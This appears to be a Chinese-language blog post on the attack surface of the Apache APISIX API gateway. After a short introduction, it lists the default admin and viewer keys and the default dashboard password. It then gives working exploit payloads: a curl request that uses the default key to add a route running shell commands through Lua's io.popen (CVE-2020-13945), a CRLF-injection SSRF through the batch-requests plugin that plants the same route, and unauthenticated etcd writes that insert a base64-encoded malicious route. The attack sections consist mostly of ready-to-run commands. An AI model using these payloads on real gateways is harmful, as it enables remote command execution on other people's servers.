Skip to content

APISIX 简介

简介

是一个高性能的API网关,其提供丰富的流量管理功能,比如 负载均衡,动态上游,金丝雀发布,熔断,认证,可观测性等。即可以处理南北流量,也可以处理东西流量。其所在的端口为 9080 其架构是基于Nginx+Lua

  • Lua编写API网关的逻辑处理代码
  • ETCD 是作为数据存储
  • APISIX 提供了 Admin REST API

image.png 其拥有大量的 HTTP EndPoint未做任何的访问控制,并且提供了默认的 Admin Key 常见的攻击点为

  1. 默认的 Admin Key
  2. 默认插件的 HTTP Endpoint【batch-requests的Restricted SSRF】
  3. Admin REST API 易受到 SSRF 攻击
  4. ETCD 易受到 SSRF 攻击
  5. 提供了可以执行 Lua 代码的插件
  6. 管理台默认密码 admin:admin

默认的adminKey:edd1c9f034335f136f87ad84b625c8f1 另外的viewerKey: 4054f7cf07e344346cd3f287985e76a2

APISix识别路径

/apisix/dashboard

攻击的方式

1. Admin key的利用

利用默认的AdminKey进行添加恶意的route,并且执行命令 

curl -i http://127.0.0.1:9080/apisix/admin/routes/114514  \
-H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '
{
"uri": "/404.html",
"plugins": {
"serverless-pre-function": {
"phase": "rewrite",
"functions" : ["return function() ngx.say(io.popen(ngx.unescape_uri(ngx.var.arg_cmd)):read(\\\"*a\\\")) ngx.exit(ngx.HTTP_OK); end"]
}
}
}'

这本身也是十分常见的漏洞利用场景,利用默认的APIkey在APISIX上进行创建相关的恶意路由 CVE-2020-13945

2.插件 bath-requests 的 ssrf

apache apisix的插件 batch-requests 提供了请求 Apache APISIX 在当前Nginx上下文环境下的路径的功能 

local data, err = core.json.decode(req_body)
-- ...
local httpc = http.new()
httpc:set_timeout(data.timeout)
local ok, err = httpc:connect("127.0.0.1", ngx.var.server_port)
if not ok then
  return 500, {error_msg = "connect to apisix failed: " .. err}
end
-- ...
local responses, err = httpc:request_pipeline(data.pipeline)

请求发送于 Apache APISIX的本身实例,所以可绕过 APISIX 对于 /apisix/admin的访问控制,其中pipeline 的参数定义如下 

pipeline = {
    type = "array",
    minItems = 1,
    items = {
        type = "object",
        properties = {
            version = {
                description = "HTTP version",
                type = "number",
                enum = {1.0, 1.1},
                default = 1.1,
            },
            method = method_schema,
            path = {
                type = "string",
                minLength = 1,
            },
            query = {
                description = "request header",
                type = "object",
            },
            headers = {
                description = "request query string",
                type = "object",
            },
            ssl_verify = {
                type = "boolean",
                default = false
            },
        }
    }
}

其实际是存在 CRLF注入的? 

POST /apisix/batch-requests HTTP/1.1
Host: 127.0.0.1:9080
Content-Length: 448

{"pipeline":[{"path":"/apisix/admin/routes/114514","method":"PUT","headers":{"Content-Length":"203\r\nX-Real-IP:127.0.0.1\r\nX-API-KEY:edd1c9f034335f136f87ad84b625c8f1\r\n\r\n{\"uri\":\"/pwn.html\",\"plugins\":{\"serverless-pre-function\":{\"phase\":\"rewrite\",\"functions\":[\"return function() ngx.say(io.popen(ngx.unescape_uri(ngx.var.arg_cmd)):read(\\\"*a\\\")) ngx.exit(ngx.HTTP_OK);end\"]}}}GET /aa HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"}}]}

3. ETCD 的利用

  • ETCD未授权且外网可以访问
  • ETCD未授权未授权且存在其他的SSRF漏洞

目标是通过控制ETCD的内容,直接在ETCD当中添加存在恶意代码的路由

$ # list routes
$ curl -i http://127.0.0.1:2379/v3/kv/range -d '{"key":"L2FwaXNpeC9yb3V0ZXM=","range_end":"L2FwaXNpeC9yb3V0ZXQ="}'
HTTP/1.1 200 OK
Access-Control-Allow-Headers: accept, content-type, authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json
Grpc-Metadata-Content-Type: application/grpc
Date: Thu, 01 Jul 2021 10:38:55 GMT
Content-Length: 247

{"header":{"cluster_id":"14841639068965178418","member_id":"10276657743932975437","revision":"1882",
"raft_term":"3"},"kvs":[{"key":"L2FwaXNpeC9yb3V0ZXMv","create_revision":"7","mod_revision":"27",
"version":"3","value":"aW5pdF9kaXI="}],"count":"1"}
$ # add routes
$ curl -i http://127.0.0.1:2379/v3/kv/put -d '{"key":"L2FwaXNpeC9yb3V0ZXMvMTE0NTE0","value":"eyJ1cGRhdGVfdGltZSI6MTYyNTExOTA0MywicHJpb3JpdHkiOjAsImNyZWF0ZV90aW1lIjoxNjI1MDQxNTgzLCJwbHVnaW5zIjp7InNlcnZlcmxlc3MtcHJlLWZ1bmN0aW9uIjp7InBoYXNlIjoicmV3cml0ZSIsImZ1bmN0aW9ucyI6WyJyZXR1cm4gZnVuY3Rpb24oKSBuZ3guc2F5KGlvLnBvcGVuKG5neC51bmVzY2FwZV91cmkobmd4LnZhci5hcmdfY21kKSk6cmVhZChcIiphXCIpKSBuZ3guZXhpdChuZ3guSFRUUF9PSyk7ZW5kIl19fSwic3RhdHVzIjoxLCJpZCI6IjExNDUxNCIsInVyaSI6IlwvcHduLmh0bWwifQ=="}'
HTTP/1.1 200 OK
Access-Control-Allow-Headers: accept, content-type, authorization
Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json
Grpc-Metadata-Content-Type: application/grpc
Date: Thu, 01 Jul 2021 10:41:42 GMT
Content-Length: 117

{"header":{"cluster_id":"14841639068965178418","member_id":"10276657743932975437","revision":"1886",
"raft_term":"3"}}

Refer

https://ricterz.me/posts/2021-07-05-apache-apisix-attack-surface-research.txt

Back to top